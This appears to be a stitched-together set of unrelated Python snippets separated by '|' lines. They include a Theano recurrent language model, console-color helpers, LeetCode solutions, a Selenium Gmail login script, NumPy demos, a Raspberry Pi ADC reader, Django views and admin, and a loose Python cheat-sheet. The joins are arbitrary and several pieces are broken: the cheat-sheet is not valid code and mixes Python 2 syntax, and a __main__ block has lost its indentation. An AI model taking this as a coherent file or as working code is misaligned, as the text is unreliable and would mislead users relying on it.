        # 2) a vector of [ 0. ] * n_samples for the log_probs
        # 3) prev_h hidden layers
        # TODO: This does not support the document bias
        states = [T.alloc(np.int64(self.sos_sym), n_samples),
                  T.alloc(np.float32(0.), n_samples),
                  T.alloc(np.float32(0.), n_samples, self.qdim)]
        outputs, updates = theano.scan(self.sampling_step,
                        outputs_info=states,
                        sequences=[T.arange(n_steps, dtype='int64')],
                        n_steps=n_steps,
                        name="sampler_scan")
        # Return sample, log_probs and updates (for tnrg multinomial)
        return (outputs[0], outputs[1]), updates
    ####
    def __init__(self, state, rng, parent):
        """Initialise the component base and create all parameters."""
        ComponentBase.__init__(self, state, rng, parent)
        self.init_params()
class RecurrentLM(Model):
    """Full recurrent language model: dictionary handling, training graph,
    update rules and compiled train/eval/sample functions."""
    def indices_to_words(self, seq, stop_at_eos = True):
        """Convert a list of token ids to a space-joined string, optionally
        truncating at the first end-of-sequence symbol."""
        sen = []
        for k in range(len(seq)):
            sen.append(self.idx_to_str[seq[k]])
            if (seq[k] == self.eos_sym) and stop_at_eos:
                break
        return ' '.join(sen)
    def words_to_indices(self, seq):
        """Convert tokens to ids; unknown tokens map to the <unk> id."""
        sen = []
        for k in range(len(seq)):
            sen.append(self.str_to_idx.get(seq[k], self.unk_sym))
        return sen
    def compute_updates(self, training_cost, params):
        """Build gradient-clipped parameter updates for the chosen optimizer."""
        updates = {}
        grads = T.grad(training_cost, params)
        grads = OrderedDict(zip(params, grads))
        # Clip stuff
        # NOTE(review): `numpy` (vs the `np` alias) must come from the star
        # imports of model/utils -- verify.
        c = numpy.float32(self.cutoff)
        clip_grads = []
        norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))
        normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))
        notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))
        # On a NaN/Inf gradient norm, shrink the parameters instead of stepping.
        for p, g in grads.items():
            clip_grads.append((p, T.switch(notfinite, numpy.float32(.1) * p, g * normalization)))
        grads = OrderedDict(clip_grads)
        if self.initialize_from_pretrained_word_embeddings and self.fix_pretrained_word_embeddings:
            # Keep pretrained word embeddings fixed
            logger.debug("Will use mask to fix pretrained word embeddings")
            grads[self.language_model.W_emb] = grads[self.language_model.W_emb] * self.language_model.W_emb_pretrained_mask
        else:
            logger.debug("Will train all word embeddings")
        if self.updater == 'adagrad':
            updates = Adagrad(grads, self.lr)
        elif self.updater == 'sgd':
            raise Exception("Sgd not implemented!")
        elif self.updater == 'adadelta':
            updates = Adadelta(grads)
        elif self.updater == 'rmsprop':
            updates = RMSProp(grads, self.lr)
        elif self.updater == 'adam':
            updates = Adam(grads)
        else:
            raise Exception("Updater not understood!")
        return updates
    def build_train_function(self):
        """Compile (lazily, once) the training function with updates."""
        if not hasattr(self, 'train_fn'):
            # Compile functions
            logger.debug("Building train function")
            # Cost is normalised by batch size before computing updates.
            model_updates = self.compute_updates(self.softmax_cost_acc / self.x_data.shape[1], self.params)
            self.train_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
                                            outputs=self.softmax_cost_acc, updates=model_updates, name="train_fn")
        return self.train_fn
    def build_eval_function(self):
        """Compile (lazily, once) the cost evaluation function."""
        if not hasattr(self, 'eval_fn'):
            # Compile functions
            logger.debug("Building evaluation function")
            self.eval_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
                                           outputs=[self.softmax_cost_acc, self.softmax_cost], name="eval_fn")
        return self.eval_fn
    def build_eval_misclassification_function(self):
        """Compile (lazily, once) the misclassification-count function."""
        if not hasattr(self, 'eval_misclass_fn'):
            # Compile functions
            logger.debug("Building misclassification evaluation function")
            self.eval_misclass_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
                                          outputs=[self.prediction_misclassification_acc, self.prediction_misclassification], name="eval_misclass_fn",
                                          on_unused_input='ignore')
        return self.eval_misclass_fn
    def build_sampling_function(self):
        """Compile (lazily, once) the naive per-step sampling function."""
        if not hasattr(self, 'sample_fn'):
            logger.debug("Building sampling function")
            self.sample_fn = theano.function(inputs=[self.n_samples, self.n_steps], outputs=[self.sample, self.sample_log_prob], \
                                             updates=self.sampling_updates, name="sample_fn")
        return self.sample_fn
    def build_next_probs_function(self):
        """Compile (lazily, once) the one-step predictor used by beam search."""
        if not hasattr(self, 'next_probs_fn'):
            outputs, h = self.language_model.build_next_probs_predictor(self.beam_source, prev_h=self.beam_h)
            self.next_probs_fn = theano.function(inputs=[self.beam_h, self.beam_source],
                                                 outputs=[outputs, h],
                                                 name="next_probs_fn")
        return self.next_probs_fn
    def build_encoder_function(self):
        """Compile (lazily, once) a function returning hidden states for input."""
        if not hasattr(self, 'encoder_fn'):
            _, h, _ = self.language_model.build_lm(self.training_x, y=self.training_y, mode=LanguageModel.EVALUATION, prev_h=self.beam_h)
            self.encoder_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.beam_h], outputs=h, \
                                              on_unused_input='warn', name="encoder_fn")
        return self.encoder_fn
    def __init__(self, rng, state):
        """Load the dictionary, build the symbolic training/eval/sampling graph."""
        Model.__init__(self)
        # Compatibility towards older models
        if not 'initialize_from_pretrained_word_embeddings' in state:
            state['initialize_from_pretrained_word_embeddings'] = False
        self.state = state
        self.__dict__.update(state)
        self.rng = rng
        # Load dictionary
        raw_dict = cPickle.load(open(self.dictionary, 'r'))
        # Probabilities for each term in the corpus
        self.str_to_idx = dict([(tok, tok_id) for tok, tok_id, _ in raw_dict])
        self.idx_to_str = dict([(tok_id, tok) for tok, tok_id, freq in raw_dict])
        # if '<s>' not in self.str_to_idx \
        #    or '</s>' not in self.str_to_idx:
        #        raise Exception("Error, malformed dictionary!")
        # Number of words in the dictionary
        self.idim = len(self.str_to_idx)
        self.state['idim'] = self.idim
        logger.debug("Initializing language model")
        self.language_model = LanguageModel(self.state, self.rng, self)
        # Init params
        self.params = self.language_model.params
        self.x_data = T.imatrix('x_data')
        self.x_cost_mask = T.matrix('cost_mask')
        self.x_max_length = T.iscalar('x_max_length')
        # The training is done with a trick. We append a special </q> at the beginning of the session
        # so that we can predict also the first query in the session starting from the session beginning token (</q>).
        self.aug_x_data = T.concatenate([T.alloc(np.int32(self.eos_sym), 1, self.x_data.shape[1]), self.x_data])
        self.training_x = self.aug_x_data[:self.x_max_length]
        self.training_y = self.aug_x_data[1:self.x_max_length+1]
        self.training_x_cost_mask = self.x_cost_mask[:self.x_max_length].flatten()
        target_probs, self.eval_h, target_probs_full_matrix = self.language_model.build_lm(self.training_x,
                                                                                           y=self.training_y,
                                                                                           mode=LanguageModel.EVALUATION)
        # Prediction cost
        #self.prediction_cost = T.sum(-T.log(target_probs) * self.training_x_cost_mask)
        self.softmax_cost = -T.log(target_probs) * self.training_x_cost_mask
        self.softmax_cost_acc = T.sum(self.softmax_cost)
        # Prediction accuracy
        self.prediction_misclassification = T.neq(T.argmax(target_probs_full_matrix, axis=2), self.training_y).flatten() * self.training_x_cost_mask
        self.prediction_misclassification_acc = T.sum(self.prediction_misclassification)
        # Sampling variables
        self.n_samples = T.iscalar("n_samples")
        self.n_steps = T.iscalar("n_steps")
        (self.sample, self.sample_log_prob), self.sampling_updates \
                    = self.language_model.build_sampler(self.n_samples, self.n_steps)
        # Beam-search variables
        self.beam_source = T.lvector("beam_source")
        self.beam_h = T.matrix("beam_h")
        self.beam_step_num = T.lscalar("beam_step_num")
|
from .log import set_verbosity # , set_repeat
from .opt import nn_opt
# Module-wide numeric tolerance used by the optimisers.
TOL = 1e-12

def set_tolerance(tol):
    """Override the module-level tolerance TOL."""
    global TOL
    TOL = tol
|
import os
import sys
class output(object):
    """
    ANSI console colored output:
      * error (red, written to stderr)
      * warning (yellow)
      * debug (green)
      * success (green)
    Set environment variable `COLOR_OUTPUT_VERBOSE' to enable debug
    """
    # ANSI foreground color offsets (added to 30 in the escape sequence).
    RED = 1
    GREEN = 2
    YELLOW = 3
    # Message categories dispatched by __out.
    ERROR = 4
    DEBUG = 5
    WARNING = 6
    SUCCESS = 7

    @staticmethod
    def __out(type, msg):
        """Write `msg` with the color and label for category `type`.

        Errors go to stderr; everything else goes to stdout.
        """
        if type == output.ERROR:
            sys.stderr.write("\033[%dm [%s] %s\033[m\n" %
                             (30 + output.RED, "Error", msg))
        elif type == output.DEBUG:
            sys.stdout.write("\033[%dm [%s] %s\033[m\n" %
                             (30 + output.GREEN, "Debug", msg))
        elif type == output.WARNING:
            sys.stdout.write("\033[%dm [%s] %s\033[m\n" %
                             (30 + output.YELLOW, "Warning", msg))
        elif type == output.SUCCESS:
            # BUG FIX: the label used to be misspelled "Sucess".
            sys.stdout.write("\033[%dm [%s] %s\033[m\n" %
                             (30 + output.GREEN, "Success", msg))

    @staticmethod
    def error(msg):
        """Print `msg` as a red [Error] line on stderr."""
        output.__out(output.ERROR, msg)

    @staticmethod
    def debug(msg):
        """Print `msg` as a green [Debug] line, only if COLOR_OUTPUT_VERBOSE is set."""
        if "COLOR_OUTPUT_VERBOSE" in os.environ:
            output.__out(output.DEBUG, msg)

    @staticmethod
    def warning(msg):
        """Print `msg` as a yellow [Warning] line on stdout."""
        output.__out(output.WARNING, msg)

    @staticmethod
    def success(msg):
        """Print `msg` as a green [Success] line on stdout."""
        output.__out(output.SUCCESS, msg)
def get_absolute_path(path):
    """Expand a leading '~' in `path` and return the absolute, normalized form."""
    return os.path.abspath(os.path.expanduser(path))
|
import pytest
from pyspark.sql import Row
from splink import Splink
def test_nulls(spark):
    """Null fields should fall back to the match-probability prior."""
    comparison_columns = [
        {
            "col_name": "fname",
            "m_probabilities": [0.4, 0.6],
            "u_probabilities": [0.65, 0.35],
        },
        {
            "col_name": "sname",
            "m_probabilities": [0.25, 0.75],
            "u_probabilities": [0.7, 0.3],
        },
        {
            "col_name": "dob",
            "m_probabilities": [0.4, 0.6],
            "u_probabilities": [0.65, 0.35],
        },
    ]
    settings = {
        "link_type": "dedupe_only",
        "proportion_of_matches": 0.1,
        "comparison_columns": comparison_columns,
        "blocking_rules": [],
    }
    # Progressively more null fields per record.
    records = [
        {"unique_id": 1, "fname": "Rob", "sname": "Jones", "dob": "1980-01-01"},
        {"unique_id": 2, "fname": "Rob", "sname": "Jones", "dob": None},
        {"unique_id": 3, "fname": "Rob", "sname": None, "dob": None},
        {"unique_id": 4, "fname": None, "sname": None, "dob": None},
    ]
    df_input = spark.createDataFrame(Row(**record) for record in records)
    linker = Splink(settings, df_input, spark)
    scored = linker.manually_apply_fellegi_sunter_weights().toPandas()
    expected = [0.322580645, 0.16, 0.1, 0.16, 0.1, 0.1]
    assert list(scored["match_probability"]) == pytest.approx(expected)
|
#!/usr/bin/env python3
__author__ = 'Wei Mu'
class Solution:
    def romanToInt(self, s):
        """Convert a Roman-numeral string to an integer.

        :type s: str
        :rtype: int
        """
        values = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}
        # Subtractive prefixes: symbol -> (symbols it may precede, amount
        # subtracted instead of added).  Only C, X and I ever subtract.
        subtractive = {
            'C': (('M', 'D'), 100),
            'X': (('C', 'L'), 10),
            'I': (('V', 'X'), 1),
        }
        total = 0
        for pos, symbol in enumerate(s):
            following = s[pos + 1] if pos + 1 < len(s) else None
            if symbol in subtractive and following in subtractive[symbol][0]:
                total -= subtractive[symbol][1]
            else:
                total += values[symbol]
        return total
|
from selenium import webdriver
import autogmailpy
import uuid
__author__ = 'Jorge'
# End-to-end Gmail smoke script: log in via Selenium, send an email whose
# body is a fresh UUID, then run the library's new-email validation step.
driver = webdriver.Firefox()
glogin = autogmailpy.GmailLogin(driver)
glogin.visit_login()
# Fluent chain: each page-object method returns the next page object;
# the final click yields the inbox page object.
inbox = glogin.fill_in_email().click_next_button().fill_in_password().click_signin_button()
# Unique body so the sent message can be identified unambiguously
# (presumably by validate_new_email — confirm against autogmailpy docs).
body = '{0}'.format(uuid.uuid4())
inbox.click_compose().fill_email(body=body).send_email().validate_new_email()
inbox.quit()
|
# Interactive script: collect three unique people (by name) from stdin,
# then print each record and the average age.
people = []      # all stored records (renamed from `list`, which shadowed the builtin)
seen_names = []  # names already entered, for duplicate detection
count = 0        # number of successfully stored records
while True:
    if count == 3:  # stop after three unique entries
        break
    person = {}  # renamed from `dict`, which shadowed the builtin
    name = input("请输入名字:")
    age = int(input("请输入年龄:"))
    sex = input("请输入性别:")
    qq = int(input("请输入QQ号:"))
    weight = float(input("请输入体重:"))
    if name not in seen_names:
        # Store the record and remember the name so later duplicates are rejected.
        person["name"] = name
        person["age"] = age
        person["sex"] = sex
        person["qq"] = qq
        person["weight"] = weight
        people.append(person)
        seen_names.append(name)
        print(people)
        count += 1
    else:
        # Duplicate name: discard the entry and prompt again.
        print("名字重复!")
age_sum = 0
for record in people:
    age_sum = age_sum + record.get("age")
    print(record)
print("年龄平均值是:%d" % (age_sum / len(people)))
|
from scheme.interpolation import Interpolator as BaseInterpolator
from scheme.util import recursive_merge
# Shared, stateless interpolation engine; the dict subclass below supplies
# the per-call variable context.
base_interpolator = BaseInterpolator()
class Interpolator(dict):
    """A parameter interpolator.

    Behaves as a plain dict of interpolation variables and delegates the
    actual evaluation work to the module-level BaseInterpolator.
    """
    def clone(self):
        # Shallow copy: a fresh Interpolator with the same key/value pairs.
        return Interpolator(self)
    def evaluate(self, subject):
        # Evaluate `subject` using this dict as the variable context.
        return base_interpolator.evaluate(subject, self)
    def interpolate(self, field, subject):
        # Delegate to the field's own interpolate hook, passing this context.
        return field.interpolate(subject, self, base_interpolator)
    def merge(self, values):
        # Merge `values` into this dict via scheme.util.recursive_merge
        # (mutates in place, returns None).
        recursive_merge(self, values)
|
from eval import *
#import eval
import unittest
deploy_path = "models/deploy.prototxt"
weight_caffemodel_path = "models/weight.caffemodel"
labels_csv = "models/labels.csv"
import json
import os
if __name__ == '__main__':
    # Inference configuration for the card-detection Caffe model.
    configs = {
        "app": "cardapp",
        "use_device": "GPU",
        "batch_size": 1,
        "custom_params": {
            # Per-class confidence thresholds — TODO confirm class order.
            "thresholds": [0, 0.8, 0.8, 0.8, 0.8, 0.8, 0.8]
        },
        "model_files": {
            "deploy.prototxt": deploy_path,
            "weight.caffemodel": weight_caffemodel_path,
            "labels.csv": labels_csv,
        }
    }
    result_dict, _, _ = create_net(configs)
    img_dir = "examples/images_card/"
    # One request per image; only "uri" is populated, "body" stays empty.
    # (Replaces the manual append loop and drops the unused `temp_i` counter.)
    reqs = [
        {"data": {"uri": img_dir + img_name, "body": None}}
        for img_name in os.listdir(img_dir)
    ]
    ret = net_inference(result_dict, reqs)
    print(ret)
class Solution(object):
    def canPlaceFlower(self, flowerbed, n):
        """Greedy check: can `n` flowers be planted with no two adjacent?

        Mutates `flowerbed` in place while planting.
        :type flowerbed: List[int]
        :type n: int
        :rtype: bool
        """
        for i, c in enumerate(flowerbed):
            # A plot is usable when it is empty and both neighbours are empty
            # (the ends of the bed count as empty neighbours).
            if (not c and (i == 0 or not flowerbed[i-1])) and (i == len(flowerbed)-1 or not flowerbed[i+1]):
                n -= 1
                flowerbed[i] = 1
                if n <= 0:
                    return True
        return not n

    def canPlaceFlowers(self, flowerbed, n):
        """Count the maximum plantable plots greedily; True if count >= n."""
        ans = 0
        for i, v in enumerate(flowerbed):
            if v:
                continue
            if i > 0 and flowerbed[i-1]:
                continue
            # `and` short-circuits, so flowerbed[i+1] is never evaluated when
            # i is the last index — no IndexError is possible here.
            if i < len(flowerbed)-1 and flowerbed[i+1]:
                # print(v)  # fixed: bare `print v` was Python 2-only syntax
                continue
            ans += 1
            flowerbed[i] = 1
        return ans >= n
if __name__ == '__main__':
print (Solution().canPlaceFlowers([0,0,0,0,1,0,1,0,0],3)) |
import cv2
# Split an image into its B/G/R channels and show each one.
img = cv2.imread("jogador.jpg")
if img is None:
    # Fail with a clear message instead of crashing inside cv2.split.
    raise SystemExit("Image load failed: jogador.jpg")
(canalAzul, canalVerde, canalVermelho) = cv2.split(img)
print(cv2.split(img))
cv2.imshow("Vermelho", canalVermelho)
cv2.imshow("Verde", canalVerde)
cv2.imshow("Azul", canalAzul)
# Without waitKey the windows are torn down as soon as the script exits.
cv2.waitKey(0)
cv2.destroyAllWindows()
|
import matplotlib.pyplot as plt  # pyplot: MATLAB-style plotting functions
# x-values and their squares, plotted as one line.
input_values = [1, 2, 3, 4, 5]
squares = [1, 4, 9, 16, 25]
# NOTE(review): the plain 'seaborn' style name was deprecated/renamed in
# Matplotlib 3.6 ('seaborn-v0_8') — confirm the installed version.
plt.style.use('seaborn')
fig, ax = plt.subplots()
ax.plot(input_values, squares, linewidth=3)  # linewidth: thickness of the line
# Chart title and axis labels.
plt.title("Square Numbers", fontsize=24)
plt.xlabel("Value", fontsize=14)
plt.ylabel("Square of Value", fontsize=14)
# Size of tick labels on both axes.
plt.tick_params(axis='both', labelsize=14)
plt.show()
|
def stringDisplay():
    """Coroutine: print every string sent to it, repeated three times."""
    while True:
        received = yield
        print(received * 3)
display = stringDisplay()
next(display)        # prime the coroutine up to its first yield
display.send('Hi!!')
def nameFeeder():
    """Coroutine that alternately labels sent values as first and last names."""
    while True:
        print('First Name:', (yield))
        print('Last Name:', (yield))
feeder = nameFeeder()
next(feeder)              # advance to the first yield
feeder.send('George')     # first name
feeder.send('Williams')   # last name
feeder.send('John')       # wraps around: treated as a first name again
# lista = ["p", "y", "t", "h", "o", "n"]
#
# for item in lista:
# print (item)
#
# for i in range(5):
# print(i)
import numpy as np
# Same matrix as a plain nested list and as a NumPy array; iterating either
# yields rows, but they print differently ([5 4 7] vs [5, 4, 7]).
list_matrix = [[5, 4, 7], [0, 3, 4], [0, 0, 6]]
array_matrix = np.array([[5, 4, 7], [0, 3, 4], [0, 0, 6]])
for row in array_matrix:
    print(row)
for row in list_matrix:
    print(row)
|
import numpy as np
# Demonstrate np.broadcast: manual iteration, shape, and element-wise add.
x = np.array([[1], [2], [3]])
y = np.array([4, 5, 6])
# Broadcast x against y (3x1 against 3 -> 3x3).
b = np.broadcast(x, y)
# b.iters is a tuple of iterators, one per broadcast operand.
# Fixed: the original line had the closing quote inside the parenthesis,
# which was a syntax error.
print('对 y 广播 x:')
r, c = b.iters
# Fixed: iterator.next() is Python 2 only; use the built-in next().
print(next(r), next(c))
print(next(r), next(c))
print('\n')
# The shape attribute reports the broadcast result's shape.
print('广播对象的形状:')
print(b.shape)
print('\n')
# Add x and y by hand through the broadcast object.
b = np.broadcast(x, y)
c = np.empty(b.shape)
print('手动使用 broadcast 将 x 与 y 相加:')
print(c.shape)
print('\n')
c.flat = [u + v for (u, v) in b]
print('调用 flat 函数:')
print(c)
print('\n')
# Same result as NumPy's built-in broadcasting.
print('x 与 y 的和:')
print(x + y)
#!/usr/bin/env python3
# read abelectronics ADC Pi board inputs
# uses quick2wire from http://quick2wire.com/ github: https://github.com/quick2wire/quick2wire-python-api
# Requries Python 3
# GPIO API depends on Quick2Wire GPIO Admin. To install Quick2Wire GPIO Admin, follow instructions at http://github.com/quick2wire/quick2wire-gpio-admin
# I2C API depends on I2C support in the kernel
import quick2wire.i2c as i2c
import time
adc_address1 = 0x68
adc_address2 = 0x69
adc_channel1 = 0x98
adc_channel2 = 0xB8
adc_channel3 = 0xD8
adc_channel4 = 0xF8
# for version 1 Raspberry PI boards use:
# with i2c.I2CMaster(0) as bus:
# for version 2 Raspberry PI boards use:
with i2c.I2CMaster(1) as bus:
    def getadcreading(address, channel):
        """Read one ADC input and return the value in volts (0.0 on overrange)."""
        # Select the channel/config register, then read the 3-byte result
        # twice: the second read returns a fresh conversion.
        bus.transaction(i2c.writing_bytes(address, channel))
        time.sleep(0.001)
        h, l, r = bus.transaction(i2c.reading(address,3))[0]
        time.sleep(0.001)
        h, l, r = bus.transaction(i2c.reading(address,3))[0]
        # Combine high/low bytes into one 16-bit sample.
        t = (h << 8 | l)
        if (t >= 32768):
            # NOTE(review): for two's-complement data this would normally be
            # t - 65536 (negative); 65536 - t folds negatives to positive —
            # confirm intended behaviour for below-zero inputs.
            t = 65536 -t
        # Counts-to-volts scale factor for this board — TODO confirm value.
        v = (t * 0.000154 )
        if (v < 5.5):
            return v
        return 0.00
    # Poll all eight inputs (two chips x four channels each) forever.
    while True:
        print ("1: %02f" % getadcreading(adc_address1, adc_channel1))
        print ("2: %02f" % getadcreading(adc_address1, adc_channel2))
        print ("3: %02f" % getadcreading(adc_address1, adc_channel3))
        print ("4: %02f" % getadcreading(adc_address1, adc_channel4))
        print ("5: %02f" % getadcreading(adc_address2, adc_channel1))
        print ("6: %02f" % getadcreading(adc_address2, adc_channel2))
        print ("7: %02f" % getadcreading(adc_address2, adc_channel3))
        print ("8: %02f" % getadcreading(adc_address2, adc_channel4))
        time.sleep(0.001)
# БСБО-05-19 Савранский С.
# Collect lines from stdin until an empty line, then print the lines that
# contain '#', numbered by their input position.
inp = []
while i := input('Line >> '):
    inp.append(i)
# Fixed: the original used inp.index(line), which reports the FIRST
# occurrence for duplicate lines; enumerate gives the true position.
print(*(f'Line {num}: {line.lstrip()[2:]}\n' for num, line in enumerate(inp, 1) if '#' in line))
|
from Hearthstone import *
def test_hearthstone():
    """Smoke-test replay loading: verify end-of-game state of a known replay."""
    g = load('replays/2015-01-21-09-14-36.hsrep', save_replay=False)
    assert g.effect_pool == []
    assert g.minion_counter == 1009
    assert g.turn == 9
    assert g.aux_vals == deque()
    assert g.action_queue == deque()
    # NOTE(review): under Python 3, dict.keys() returns a view that never
    # compares equal to a list, so this assertion only holds on Python 2
    # (or if minion_pool.keys() actually yields a list) — confirm.
    assert g.minion_pool.keys() == [1000, 1001, 1005, 1006, 1007, 1008]
|
import doctest
import os
import manuel.codeblock
import manuel.doctest
import manuel.testing
from . import testcode
from . import unicode_output
def get_doctest_suite(docnames):
    """Return the doctest suite for specified docnames.

    Each name is resolved relative to the current working directory and run
    through a Manuel pipeline (permissive-unicode doctests + code blocks).
    """
    cwd = os.getcwd()
    absolute_docs = [os.path.join(cwd, name) for name in docnames]
    pipeline = manuel.doctest.Manuel(
        parser=unicode_output.PermissiveUnicodeDocTestParser(),
        optionflags=doctest.ELLIPSIS,
    )
    pipeline += manuel.codeblock.Manuel()
    pipeline += testcode.Manuel()
    return manuel.testing.TestSuite(pipeline, *absolute_docs)
|
def may_be_password(number):
    """Return True if *number* is a plausible password (AoC 2019 day 4 rules).

    A candidate must be six digits long, contain at least one pair of equal
    adjacent digits, and have digits that never decrease left to right.
    """
    digits = str(number)
    # (Dropped the redundant second str() call the original applied to an
    # already-converted string.)
    return (
        len(digits) == 6
        and any(a == b for a, b in zip(digits, digits[1:]))
        and all(a <= b for a, b in zip(digits, digits[1:]))
    )
if __name__ == '__main__':
    # Count candidates in the puzzle's inclusive input range.
    low, high = 138241, 674034
    print(sum(may_be_password(candidate) for candidate in range(low, high + 1)))
|
# Listnode.next: always check null
## digit is %
## carry is /
## binary question: "2" divide. mid is 0. mid right is 0 1. so size is still 2. avoid
## if a variable is used after a while loop and must also work when the loop body never ran, initialize it so its state on loop exit matches its state when the loop was never entered
## int(x) str(x)
isupper(), islower(), lower(), upper()
a = dict()
a.get(1) -> None a[1] -> KeyError
s.index('@') find (-1)
local_name, domain_name = email.split("@")
chr(ord('A'))
txt = "I like bananas"
x = txt.replace("bananas", "apples")
#dfs:
path.append(reminder)
res.append(path[:]) #copy template
path.pop()
sys.maxint # py2
sys.maxsize # py3
float("-inf") # always work. large
sum = -1 if nums[i] == 0 else 1
abbr[j].isdigit()
a.isalpha()
startswith("xx")
isalnum()
hexa = int(s, base=16)
max([1, 2, 3])
s.strip() #s.lstrip() s.rstrip()
from Queue import Queue # py2
from queue import Queue # py3
self.queue = Queue()
self.queue.get()
self.queue.put(val)
self.queue.qsize()
self.queue.empty()
from collections import deque
a = deque()
queue = deque([root])
a.append(1) # appendleft(1)
a.pop() # popleft()
list(a) # different from queue.Queue()
len(a)
## extend() extendleft()
# list is stack
a = []
a.append(1)
a.extend(list)
a.pop()
a.insert(index, elem)
a = set() # or {1} but not {}. {} is a dict
a.add(1)
a.remove(1) # Raises KeyError
a.discard(1) # if present
# min heap [1,2]
from heapq import heappush, heappop
heappush(heap, item)
heappop(heap)
# heap[0] min
# heappushpop(heap, item) always min heapreplace(heap, item) the min will always out
# lambda
intervals = sorted(intervals, key = lambda x : x.start)
l.sort(key=lambda x: (x.split()[1:], x.split()[0]))
def abc(x):
y,z = x.split(" ")[1:],x.split(" ")[0]
y.append(z)
return y
ll = sorted(ll, key = abc)
max(num, key=sumDigit) max(num, num1, num2, key=len)
A.sort()
a = None or a = set() or a = []
if a:
a = ""
print (not a)
current = dummy = ListNode(-1)
''.join(['a','b','c','d'])
s[::-1] # return new s
''.join(reversed(s))
str.reverse() # not exist
## reversed returns iterator. sorted is okay. print
list(reversed(list))
list.reverse()
list[::-1]
for key in dict:
# py3 its just a view
for key, value in d.items():
dict[a] = dict.get(a, 0) + 1 # value if default
list(a.items()) list(a)
a = "ab"
print (a[5:4]=="") # true
5 // 2
######
A = {}
class Solution:
B = {}
def xx(self):
self.C = {}
def xxx(self):
A
self.B
self.C
#swap
nums[index], nums[nextIndex] = nums[nextIndex], nums[index]
# else 1) range not go in 2) range completes w/o break
for i in range(0,0):
print (1)
break
else:
print (2)
## if range not go in, i is not available
## if break, i is intented
C = [[0] * k for i in range(n)]
letter = 'a' letter * 5 = 'aaaaa'
# for d, r in zip(digit, rom):
for i, j in zip('ABCD', 'xy'):
print (i, j)
# A x, B y
dict: my_dict.pop('key', None)
my_dict.pop('key')
del myDict['key']
https://stackoverflow.com/questions/11520492/difference-between-del-remove-and-pop-on-lists
for set, a.remove(1) # Raises KeyError a.discard(1)
# lists
# del pop index. remove value.
# dictionary
# del pop key.
import random
random.sample(population, k) # without replacement
random.randint(0, 10) #[0, 10]
random.choices(list, k=4)
random.choices(list, k=4)
random.choice(sequence)
# list. comma 分开所有要加到list里的
queue += (x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)
bfs wiki
int (4.8) = 4 print (8/4) = 2.0
print([[]]*5) [[],[],[],[],[]] # but they are all the same (address/refer)
empty_lists = [ [] for i in range(n) ] # better
#content
board[:] = [['XO'[c == 'W'] for c in row] for row in board] # content changed as board is parameter
xxx = board[:] #copy
'abc'.index('a') exception 'abc'.find('a') -1
# string is not mutable!!!
# cannot add mutable stuff to set or dict. tuple is not mutable but list is
# bfs dx dy don't forget to check boundary <0. and while queue, not visited
# iterable (list, tuple, set, dictionary...)
1 in (1,2,3) or 1 in [1,2,3]
#python floor division: 3//-2 = -2
int(3.2) = 3 int(-3.2) = -3 # int(3/-2) to get 3/-2 in java
# split at any space
data.split()
' '.join(bfs_order)
for v in vs: ## dynamic
for i in range(len(vs)) ## static
# You cannot use a list as a key because a list is mutable. ... (You can only
# use a tuple as a key if all of its elements are immutable.)
object()  # creates a unique empty sentinel object
use `xxx is not None` instead of `not xxx` (otherwise falsy values like 0 are conflated with None)
method(lst) -> lst[1]=1 or lst.remove() both works
for new_s in (s[:i]+'--'+s[i+2:] for i in range(len(s)-1) if s[i:i+2]=='++'):
for i in range(0):
print('a')
else:
print('b')
# no print(i)
# but b
# string format
f"{to_lowercase(name)} is funny."
ap = collections.defaultdict(list)
def calculateSquare(n):
return n*n
numbers = (1, 2, 3, 4)
result = map(lambda x: 1 if 'e' in x else 0, numbers)
result = map(calculateSquare, numbers)
numbersSquare = set(result)
a = [1,2]
b = [1,2]
a == b
class MyError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
try:
raise MyError(2*2)
except MyError as e:
print 'My exception occurred, value:', e.value
# ArithmeticError ValueError(sub IndexError)
traceback.print_exc()
assert ('linux' in sys.platform)
mid = l + ((r - l) >> 1))
a = [1,2]
b = a
a[0] = 100
print (a)
num1 = float(input())
# avoid key error
import collections
self.freq = collections.Counter()
self.group = collections.defaultdict(list)
**var
|
from .models import Backup, Host
from rest_framework import viewsets
from .serializers import BackupSerializer, HostSerializer
class BackupViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows backups to be viewed or edited.
    (Docstring fixed: it previously said "users", a copy-paste leftover.)
    """
    # Newest backups first.
    queryset = Backup.objects.all().order_by('-id')
    serializer_class = BackupSerializer
class HostViewSet(viewsets.ModelViewSet):
    """
    API endpoint that allows hosts to be viewed or edited.
    (Docstring fixed: it previously said "groups", a copy-paste leftover.)
    """
    queryset = Host.objects.all()
    serializer_class = HostSerializer
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from account.models import User
class AccountUserAdmin(UserAdmin):
    """Admin configuration for the custom User model, exposing api_secret."""
    list_display = ('username', 'email', 'first_name', 'last_name', 'is_staff',
                    'api_secret')
    search_fields = ('username', 'first_name', 'last_name', 'email',
                     'api_secret')
# Register the custom User model under this admin configuration.
admin.site.register(User, AccountUserAdmin)
|
from django.shortcuts import render, get_object_or_404
from .models import Blog
def all_blogs(request):
    """Render the blog index listing every Blog."""
    context = {'blogs': Blog.objects.all()}
    return render(request, 'blogs/blogs.html', context)
def details(request, blog_id):
    """Render one blog post looked up by primary key (404 if absent)."""
    post = get_object_or_404(Blog, pk=blog_id)
    return render(request, 'blogs/detail.html', {'blog': post})
def titled_url(request, slog):
    """Render one blog post looked up by its exact title (404 if absent)."""
    post = get_object_or_404(Blog, title=slog)
    return render(request, 'blogs/detail.html', {'blog': post})
|
from flask import Response, make_response
from flask import render_template, flash, redirect, url_for, request, jsonify, session, g, abort
from app import app, db, lm
from flask_security import auth_token_required
from flask_security import Security, UserMixin, RoleMixin
from flask.ext.login import login_user, logout_user, current_user, login_required
from .forms import LoginForm, RegistrationForm, CreateClassForm
from .models import User, Allclass, Enrollment
